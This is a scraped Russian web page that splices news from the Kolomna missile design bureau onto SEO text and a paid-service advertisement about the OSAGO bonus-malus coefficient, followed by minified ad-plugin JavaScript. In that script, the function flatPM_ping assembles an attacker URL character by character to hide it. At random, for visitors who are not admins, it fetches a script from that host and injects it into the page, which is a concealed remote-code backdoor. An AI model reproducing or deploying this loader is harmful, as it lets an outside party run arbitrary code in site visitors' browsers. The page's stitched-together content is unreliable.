Официальный сайт кбм

акционерное общество
Научно-производственная корпорация
Конструкторское бюро машиностроения

Сегодня в КБМ были вручены 48 свидетельств об окончании Школы молодого специалиста

Ежегодная конференция молодых специалистов пройдёт в феврале

Лично-командное первенство АО «НПК «КБМ» по настольным играм выявило сильнейших

Прошёл первый этап квеста, организованного КБМ совместно со школой № 15

В КБМ отметили главный праздник — День Ракетных войск и артиллерии

Медаль Минобороны управляющему директору КБМ вручили на городском праздновании Дня ракетных войск и артиллерии

Приём заявок на конкурс «Лучший молодой специалист КБМ» пройдёт до 25 ноября

Школа молодого специалиста КБМ вновь открыла двери

Первичная профсоюзная организация «КБМ-Коломна» готовится к проведению новогодних праздников

Начавшаяся в сентябре в КБМ прививочная кампания продлена до конца ноября

Мужская команда КБМ одержала победу на Открытом первенстве Коломенского городского округа по баскетболу

Указом Президента РФ трое сотрудников КБМ представлены к наградам

Подходят к завершению работы по благоустройству на территории АО «НПК «КБМ», запланированные на этот год

Ветераны космодрома «Байконур» и ветераны труда КБМ провели встречу с коломенскими школьниками

В адрес управляющего директора КБМ поступило благодарственное письмо от директоров четырёх коломенских школ

Одному из старейших цехов КБМ исполнилось 50 лет

Спортсмены АО «НПК «КБМ» завоевали 27 наград на Мировых корпоративных играх

В Московской области экипажи ударных вертолетов Ми-24 ЗВО учились уничтожать ракетами бронетехнику противника

Оперативно-тактические и тактические ракетные комплексы

Оперативно-тактический ракетный комплекс (ОТРК) — вид ракетного вооружения, предназначенный для поражения целей противника на оперативную глубину относительно линии фронта.

Переносные зенитные ракетные комплексы

Переносной зенитно-ракетный комплекс (ПЗРК) — это зенитно-ракетная система, предназначенная для транспортировки и ведения огня одним человеком. Благодаря небольшим размерам ПЗРК легкомаскируемы и мобильны.

Противотанковые ракетные комплексы

Противотанковая управляемая ракета (ПТУР) — управляемая ракета, предназначенная для поражения танков и других бронированных целей.

Комплексы активной защиты

Расположенные на танке системы отстрела специальных снарядов, совмещённые с радиолокационной системой локального действия.

Наше предприятие

Акционерное общество «Научно-производственная корпорация «Конструкторское бюро машиностроения» (АО «НПК «КБМ») — крупный конструкторский и научно-производственный центр, проводящий работы по проектированию, изготовлению, испытанию и в целом комплексной отработке вооружения и военной техники различного направления.

Что такое КБМ и как вернуть?

Коэффициент бонус-малус (КБМ) — коэффициент, соответствующий классу, присваиваемому водителю или собственнику транспортного средства, влияющий на стоимость ОСАГО. При заключении договора ОСАГО страховая компания обязана использовать сведения о предыдущих периодах страхования, содержащиеся в автоматизированной информационной системе Российского союза автостраховщиков (АИС РСА). При несоответствии значения КБМ предыдущему страховому стажу водителя и его безаварийному периоду, необходимо Восстановить КБМ по базе РСА. Восстановление КБМ онлайн в базе РСА осуществляется на нашем сайте Восстановления КБМ как правило за сутки. В отдельных случаях срок Возврата КБМ может быть увеличен до 7-8 рабочих дней. Верните свой законный КБМ. Также вы можете на сайте Проверить КБМ всего за минуту, используя удобный калькулятор расчета и проверки КБМ. Узнать КБМ в базе то очень просто! Сервис КБМ онлайн всегда готов Вам помочь!

Зачастую, при смене водительского удостоверения, из-за халатности или злого умысла страховых агентов, коэффициент бонус-малус (КБМ) не верно указывается в полисах ОСАГО, вследствие чего полис становится существенно дороже и в базе РСА коэффициент определяется не верно.

Мы подаем заявки в РСА на восстановление данного коэффициента.
КБМ варьируется от 0,5 до 2,45. Для примера, для ставки на ОСАГО равной 10 000 рублей, при КБМ=0,5 стоимость полиса будет равна 5000 рублей, а если КБМ=2,45, то уже стоимость полиса будет 24 500 рублей.

Наши преимущества! Всё онлайн — работаем удалённо!

Не требуется: посещение офисов, сбора дополнительных документов, предоставления истекших полисов ОСАГО и заполнения заявлений.

Сохраните своё время и деньги, без очередей и ожидания 60 дней ответа (решения) от РСА и ЦБ РФ.
100% ГАРАНТИЯ отправки Вашей заявки в день обращения!

Проверка КБМ по базе РСА

* виджет проверки КБМ размещен на правах рекламы, согласно партнерского соглашения с kbmka.ru. Подробнее с условиями оказания услуги можно ознакомиться на сайте.

При заключении или продлении договора ОСАГО для расчета итоговой стоимости страхования применяется коэффициент бонус-малус (КБМ). КБМ может увеличить или, наоборот, уменьшить стоимость полиса, в зависимости от количества аварий и страховых выплат, которые были зафиксированы за заключающим договор лицом в предыдущий период.

Коэффициент обновляется ежегодно и при стаже безаварийной езды в 10 лет достигает своего максимального значения – 0,5, или скидки в размере 50% от стоимости полиса.

К сожалению, нередки случаи, когда автолюбители вдруг узнают, что скидки у них больше нет. В такой ситуации необходимо проверить данные, внесенные в базу АИС Российского союза автостраховщиков. Проверка КБМ по базе РСА занимает не больше минуты и доступна всем пользователям бесплатно. Для проверки коэффициента необходимо зайти на сайт РСА и пройти по пути «ОСАГО» – «Расчет стоимости ОСАГО» – «Проверить КБМ».

Чтобы приступить к проверке, надо согласиться с обработкой персональных данных, поставив галочку в соответствующем окошке.
Проверка КБМ по базе РСА доступна только для граждан и резидентов РФ.

Если собственник транспортного средства юридическое лицо, для проверки будет необходимо указать:

  • ИНН собственника автомобиля;
  • VIN или знак государственной регистрации ТС;
  • Номер кузова и шасси;
  • Дату начала действия договора или допсоглашения.

При заполнении данных о транспортном средстве указываются только цифры и латинские или кириллические буквы.

При проверке коэффициента физического лица, являющегося собственником транспортного средства, если договор заключён без ограничения круга лиц, которые допущены к управлению автомобилем, указываются:

  • Фамилия, имя и отчество собственника ТС;
  • Дата рождения;
  • Тип удостоверяющего личность документа, его серия и номер;
  • VIN или знак государственной регистрации ТС;
  • Номер шасси и кузова;
  • Дата начала действия договора или допсоглашения.

Если договор заключен с указанием ограниченного количества лиц, которые допущены к управлению ТС, для проверки необходимо указать:

  • Фамилию, имя и отчество каждого водителя;
  • Дату рождения (полностью);
  • Данные водительского удостоверения (серия и номер);
  • Дату начала действия договора или допсоглашения.

Для получения корректной информации важно правильно указать дату запроса: она должна совпадать с датой начала действия нового полиса, но не раньше следующего дня после окончания предыдущего договора. После подтверждения кода безопасности на странице будет отражена запрашиваемая информация.

Если по расчетам скидка КБМ должна быть больше, но в системе это не отражено, прежде чем подать заявление страховщику на восстановление КБМ и жалобу в РСА, необходимо убедиться в следующем:

  • Действительно ли за прошедший период не было страховых случаев и выплат;
  • Действительно ли прошел полный год. Скидка увеличивается каждый год на 5%, если прошедший период меньше, скидка остается прежней;
  • Не прошло ли больше года после окончания договора автострахования. КБМ сохраняется в течение одного года после окончания срока действия полиса ОСАГО, если договор страхования более не продлевается, скидка обнуляется.

Если все факты говорят о том, что коэффициент указан неверно, необходимо заняться его восстановлением. С декабря 2015 года действует упрощенная схема, согласно которой для применения корректного КБМ достаточно направить заявление о несогласии в страховую компанию, с которой страхователь заключил или собирается заключить договор. Далее страховой также проводится проверка КБМ по базе РСА и, в случае некорректных данных, заменяет значение коэффициента.

Если же по какой-то причине восстановить КБМ таким способом не получится, необходимо составить и направить жалобу в РСА как вышестоящую организацию, контролирующую деятельность страховых компаний. Для подачи жалобы по факту некорректного применения коэффициента бонус-малус необходимо заполнить обращение в Союз, шаблон которого находится в подразделе «Направить жалобу в РСА», и приложить копии паспорта и водительского удостоверения. При подаче жалобы в обязательном порядке указываются:

  • Фамилия, имя и отчество (полностью);
  • Дата рождения (полностью);
  • Номер водительского удостоверения.

При отсутствии одного из документов или некорректном заполнении заявления жалоба не будет рассмотрена. Документ отправляется по обычной почте, представляется лично или отправляется в виде скан-копии на электронный адрес Союза. Срок рассмотрения РСА обращения с проверкой коэффициента по базе – 30 дней.

После восстановления корректного КБМ данные обновляются в АИС РСА и расчет дальнейшей скидки производится корректно. Возврат переплаты по полисам ОСАГО осуществляется через обращение в ЦБ: после подтверждения переплаты страховщик перечисляет страхователю сумму на указанный расчетный счет.

КБМ и что это такое

Для подписания договора с любой страховой компанией, получения полиса, представители компании обязаны брать данные о КБМ из базы данных РСА, для расчета персональной стоимости заключения договора.

КБМ, напрямую влияет на цену оказания услуг страхования компаниями. Он варьируется в зависимости от типа вождения автомобилиста. Если владелец бывал в авариях, коэффициент повышается, что естественно повышает стоимость заключения договора со страховыми компаниями. Если наоборот, водитель в дтп не участвовал, коэффициент понижается, снижается цена на страховые услуги.

КБМ водителя

Подразделения общего коэффициента, присваивается каждому водителю, в момент получения водительских прав. Является уникальным для каждого человека.

КБМ владельца автомобиля

Еще одно подразделение общего коэффициента. При страховании автомобиля в какой-либо страховой компании, представители высчитывают отдельный коэффициент для владельца этого транспорта.

Начальный КБМ

При заключении договора о предоставлении страхования автомобиля, представители компании рассчитывают коэффициент для владельца авто на момент подписания договора.

Расчетный КБМ

Особое подразделение общего коэффициента, его применяют для расчета премии, предусмотренной договоров со страховой компанией.

Классы КБМ

КБМ подразделяется на классы. Они нужны, чтобы вычислить скидку, либо же наоборот наценку на полис. Присваиваемый класс зависит от множества факторов. К таким относятся дорожно-транспортные происшествия, количество случаев либо наоборот, их полное отсутствие. По мере накопления стажа вождения, при этом автомобиль застрахован, при отсутствии страховых случаев (аварий), каждый год повышается классность.

Как рассчитывается КБМ

Расчет коэффициента происходит по нескольким пунктам. К таким относится возраст водителя, стаж вождения, количество страховых случаев (ДТП), характеристика автотранспорта, территориальный КБМ, условия заключенного договора. КБМ является своеобразной скидкой при подписании договора со страховой компанией. В расчет берутся все нюансы, чтобы высчитать наиболее точный коэффициент.

Если водитель получил полис впервые, он получит 3 класс. Однако, если он в течение года станет участником ДТП, он не только лишится скидки на продление страховки, но и повысит ее стоимость. Так происходит только в случае обращения клиента за выплатой в страховую компанию, т.е фиксация случая в компании. Если клиент восстанавливает машину за свои средства, то коэффициент останется без изменений, а на следующий год изменится в лучшую для него сторону.

Что из себя представляет база КБМ

В некоммерческой компании «Российский Союз Автострахования» предусмотрена специальная база данных, содержащая в себе сведения о всех договорах между страховыми компаниями и их клиентами. Так же там хранятся сведения КБМ на каждого клиента страховой компании, входящей в союз РСА. Именно из этой базы представители страховой компании берут данные, для заключения договора с клиентом.

Как проверить КБМ

Процесс проверки коэффициента не является сложным процессом, делится на 2 типа. Актуальный и текущий. Текущий это тот, который был присвоен при подписании договора со страховой компанией, он указывается в полисе. Однако он может постоянно меняться, в зависимости от данных, содержащихся в системе информации (АИС) Союза (РСА). Проще говоря, зависит от аккуратности вождения.

Узнать актуальный коэффициент можно на нескольких сайтах, однако настоятельно рекомендуется пользоваться официальным сайтом РСА. Для того чтобы произвести расчет, необходимо перейти на нужную вкладку, откроются поля, которые необходимо заполнить. В них нужно ввести имя, фамилию, отчество через пробелы, дату рождения водителя, а так же остальные данные документа (паспорт, водительское удостоверение). После этого становится возможным произвести расчет.

Причины изменения коэффициента

Естественно, коэффициент не постоянный и может подвергаться постоянным изменениям согласно действующим законам. В первую очередь, постоянные коэффициент не выгоден страховым компаниям, так как выплаты по страховым случаям не уменьшаться, а стоимость договора не увеличится.

Изменение происходит исходя из нескольких пунктов. В положительную сторону он может меняться только в том случае, если водитель проявляет стремление к аккуратной, безопасной езде, т.е не становится участником дтп. В этом случае коэффициент будет снижаться, давая водителю скидку на заключения договора в следующем году (по истечению действующего полиса). В противном случае коэффициент будет наоборот повышаться, что повлечет за собой существенное повышение цены на страховые услуги.

Как восстановить КБМ

После утраты класса, коэффициента есть только один способ восстановления прежних значений — аккуратное вождение. Либо изменения можно вообще избежать, не обращаясь за выплатами в страховую компанию, восстанавливая автотранспорт своими средствами. Однако в этом случае теряется необходимость страхования как такового. За каждый год без происшествий начисляется 5% скидка, которая суммируется с уже имеющейся (система накопления).

Направление жалобы по КБМ в Союз Автострахования

В случае возникновения внештатной ситуации, к примеру при заключении договора с компанией выяснилось, что в базе данных нет сведений на водителя, заявления можно отправить на электронные адреса, указанные на официальном сайте в блоке «Электронная приемная». Для случаев, не терпящих отлагательств, предусмотрены телефоны горячей линии.

Заключение

Для сохранения коэффициента необходимо не участвовать в происшествиях, однако полностью исключить вероятность дтп невозможно, так как на дороге присутствуют и другие водители, в адекватности которых нельзя быть уверенным.

Официальный сайт кбм

Не секрет, что стоимость автострахования ОСАГО зависит от водительского стажа и количества ДТП случившихся по вине Водителя.

При расчете стоимости полиса, страховая компания всегда обязана использовать особый коэффициент — КБМ (коэффициент бонус-малус). Подробнее о КБМ

Мы все знаем, что страховка при аварии повышается, но не все знаем, что она так же можем уменьшаться. КБМ – единственный показатель, который позволяет нам экономить до 50% от базовой стоимости полиса ОСАГО.

Простыми словами, КБМ — это бонус автовладельцу за аккуратное вождение. За каждый, безаварийный год езды, стоимость вашего автострахования уменьшается на 5%, вплоть до получения 50% скидки. Этот индекс зависит от водителя и закрепляется за ним с прикрепленным новым классом, независимо какое транспортное средство он водит.
Формула расчёта полиса ОСАГО Классы водителей

Не переплачивайте по ОСАГО, проверяйте Ваш текущий КБМ бесплатно на нашем сайте и заказывайте услугу по восстановлению.

Обратите внимание. Услуга по восстановлению считается выполненной, только при условии, что Ваш КБМ будет понижен минимум чем на 10%. Если Ваш КБМ понизиться всего на 5%, или не изменится, система автоматически произведёт возврат средств через банк эквайринг, в полном объеме.

База АИС РСА:
Обеспечивает доступ к необходимой информации по всем участникам дорожного движения, позволяет рассчитывать коэффициент бонус-малус, на основании которого страховые организации предоставляют автовладельцам скидку за безаварийную езду на полисы обязательного страхования автогражданской ответственности.

Проверка КБМ онлайн

Вы также, можете сверить текущее значение коэффициента бонус-малус водителя, на сайте Российского Союза Страховщиков

Вы в любом случае получите выгоду, уменьшиться стоимость ОСАГО на 10-50% или Вам вернуться деньги в полном объёме

Сможете сделать перерасчет ОСАГО по предыдущим полисам и вернуть всю переплату.

  • Заполняете заявку. Всё онлайн, без посещения офиса
  • Мы формируем электронное заявление на перерассчет и передаем данные напрямую в АИС РСА
  • Оплачиваете.Надёжно, по 54-ФЗ, любым удобным способом через Яндекс.Кассу
  • Отслеживаете. Четкое понимание всех этапов заявления в онлайн реестре

Вариант 1КБМ полностью восстановлен. Вы каждый год экономите на ОСАГО и можете вернуть переплату по предыдущим полисам

Вариант 2Автоматический возврат средств, если ваш КБМ понижен всего на 5%, или понижение вашего КБМ не возможно

Заявка на восстановление КБМ

Документы для самостоятельного восставновление КБМ:

  • Проверьте правильность введенных данных. В случае понижения КБМ по ошибочным данным — оплата не возвращается.
  • Процесс восстановления КБМ занимает в среднем 24 часа, в редких случаях до 10 рабочих дней.
  • При возврате оплаты, деньги возращаються автоматически через банк эквайринг в течении 3 дней.
    Возврат осуществляется по реквизитам, с которых была произведена оплата заявки.

Онлайн-реестр отображает данные по заявлениям — 24/7.
Служба поддержки: 8(800)100-30-51 с 10:00 до 20:00 по Мск

Коэфицент КБМ До

Коэфицент КБМ после

Гибатуллина О. В.

Колобовников С. П.

Всё онлайн, без посещения офиса, предоставления истёкших ОСАГО и заполнения заявления

Без ожидания писменного ответа (60 дней) от РСА и ЦБ РФ

Надёжно, работаем по 54-ФЗ, все платежи на сервисе принимаются через агрегатора Яндекс Касса

Если коэффициент изменился на 10% или менее = автоматический возврат средств за услугу

Всё онлайн, без посещения офиса, предоставления истёкших ОСАГО и заполнения заявления

Без ожидания писменного ответа (60 дней) от РСА и ЦБ РФ

Надёжно, работаем по 54-ФЗ, все платежи на сервисе принимаются через агрегатора Яндекс Касса

Если коэффициент изменился на 10% или менее = автоматический возврат средств за услугу

Все страховые компании производят расчет по основным факторам, которые влияют на итоговую стоимость полиса:

ТБ — базовая ставка страхового тарифа

КТ — территориальный коэффициент;

КБМ — коэффициент бонус-малус

КВС — коэффициент возраста и стажа водителя

КО — коэффициент ограничение на количество допущенных лиц;

КМ — коэффициент мощности двигателя;

КС — коэффициент периода использования ТС;

КП — коэффициент срока страхования;

КН — коэффициент нарушений в полисе ОСАГО;

КПр — коэффициент для ТС с прицепом.

В виде формулы, расчет стоимости полиса ОСАГО (Т) выглядит следующим образом:

Т = ТБ х КТ х КБМ х КВС х КО х КМ х КС х КП х КН

Таблица КБМ состоит из нескольких основных разделов:

— класс на начало срока страхования по полису

— коэффициент, который учитывается в формуле при расчете

— класс, который учитывается при заключении нового полиса, в зависимости от наличия или отсутствия страховых случаев.

Количество страховых случаев (выплат), произошедших в период действия предыдущих договоров ОСАГО

Класс, который будет присвоен

При заключении своего первого договора ОСАГО клиенту присваивается коэффициент равный 1. Если в течение года автовладелец не попадал в аварии, то уже на следующий год его коэффициент снизится на 5% и будет равен 0,95. Таким образом за 10 лет безаварийной езды можно снизить свой КБМ до отметки 0.5, что даст возможность оформлять полис ОСАГО с 50-процентной скидкой.

1) Вы заменили свои старые права на новые, данные в АИС РСА обнулились

2) За каждый год безаварийной езды скидка увеличивается на 5%. Именно за один год. Если Вы ездили только полгода, скидка не предоставляется. Так же, если Вы вписали супругу или друга в середине действия своего полиса.

3) Вас вписали в полис друзья или родственники. Возможно, они не обратили внимание на размер КБМ, а агент не уделил должного внимания этому вопросу и сделал всем 3 класс (обнулил скидку). Теперь Вы в базе РСА с обнуленной скидкой.

4) Ваши данные занесли с ошибкой. Например, в дате рождения, или в серии водительского удостоверения.

Текущий КБМ можно увидеть в нижней части вашего полиса ОСАГО или проверить у нас на сайте в пару кликов.

Восстановили КБМ, можно вернуть и переплату за предыдущие годы.

По действующему полису:

Страхователю нужно обратиться в ближайший офис свое й СК, для оформления заявления на перерасчет.
С собой необходимо взять: Паспорт, Текущий страховой полис (будет произведена замена полиса), Водительское удостоверени е . Свидетельство о регистрации ТС, Реквизиты своего счета (именно платежные реквизиты). В офисе компании выдадут бланк заявления на перерасчет. Заполните. Работники заполнят новый полис и рассчитают размер переплаты.

По полисам закончившим свое действие:

Написать и отправить заказное письмо в ЦБ. ЦБ направляет запрос страховщику по вашей претензии, требуя проверить информацию и отчитаться о сделанном, и сообщает вам об этом (приходит письмо от ЦБ). Вы получаете письмо от страховщика, в котором будут ваши полисы (в том числе с истекшим сроком действия) по которым будет рассчитана скидка КБМ по ОСАГО, а так же выполнены перерасчеты по каждому полису – вы сразу увидите сумму, которую обязан вернуть страховщик. С данным письмом необходимо обратиться в ближайший офис своего страховщика, предъявить данное письмо и оставить реквизиты своего банковского счета для перечисления Ва м сверх уплаченных сумм по договорам ОСАГО.

Как заполнить письмо в ЦБ ? бланк заявления Вы можете скачать в нашем разделе “Документы”.
Заполняем заявление, с тавим подпись и дату. Делаем копию своего текущего (действующего) полиса ОСАГО и прикладываем к данному письму. Если страховые компании были разные, пишите несколько писем. Всё складываем в конверт (подписанное письмо, копия полиса, копия водительского удостоверения) и отправляем обязательно заказным письмом.

Важно знать: Возврат денег страхователю возможен только за последние 3 года.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}